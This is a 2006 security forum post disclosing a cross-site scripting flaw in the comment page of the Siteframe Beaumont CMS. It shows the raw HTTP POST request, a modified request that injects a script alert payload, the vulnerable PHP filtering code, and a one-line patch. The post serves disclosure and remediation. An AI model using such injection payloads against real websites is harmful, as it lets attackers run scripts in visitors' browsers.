|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 62
Members: 0
Total: 62
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Siteframe Beaumont 5.0.2 Cross-Site Scripting |
|
Posted: Thu Feb 16, 2006 4:58 pm |
|
|
Kiki |
Regular user |
|
|
Joined: Nov 13, 2005 |
Posts: 7 |
Location: Italy |
|
|
|
|
|
|
Excused for as the advisory will appear in this post but for reasons of apparition I have had to modify a attimino if the page would not have modified all.
Code: |
Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability
####################################
Information of Software:
Software: Siteframe Beaumont 5.0.1a
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management
system designed for the rapid deployment of community-based websites.
With Siteframe,a group of users can share stories and photographs, create blogs,
send email to one another, and participate in group activities.
####################################
Bug:
Siteframe contains a flaw that allows a remote cross site scripting attack.
The vulnerability is found in the user comment page and the user can modify
the function GET and insert the XSS code
- http POST request
http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
comment_id=&comment_user_id=554&comment_page_id=116&comment
_reply_to=&comment_subject=Kiki&comment_text=Hi&_submitted=1
but we can modify the request POST in this way:
comment_id=&comment_user_id=554&comment_page_id=116&comment
_reply_to=&comment_subject=Kiki&comment_text=<script>alert("lol");
</script>&_submitted=1
---------------------------------------------------------
Example:
you can insert in the text post an XSS code or you can modify the request in this way:
comment_id=&comment_user_id=554&comment_page_id=116&comment
_reply_to=&comment_subject=Kiki&comment_text=[XSS]&_submitted=1
---------------------------------------------------------
The bug is in this part of DataObject.class.inc
[...]
// strip html
if ($info['formatted'] == 'ANY')
; // anything is allowed
else if ($info['formatted'])
$val = strip_tags($val, config('allowed_html'));
else if ($info['type'] != 'xml')
$val = strip_tags($val);
[...]
- Patch
in includes/DataObject.class.inc, change this:
if ($info['formatted'] == 'ANY')
to this:
if (!strcasecmp($info['formatted'], 'ANY'))
####################################
Credit:
Author: Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org
####################################
|
Original advisory:
http://kiki91.altervista.org/exploit/siteframe_5.0.2_xss.txt
Kiki |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|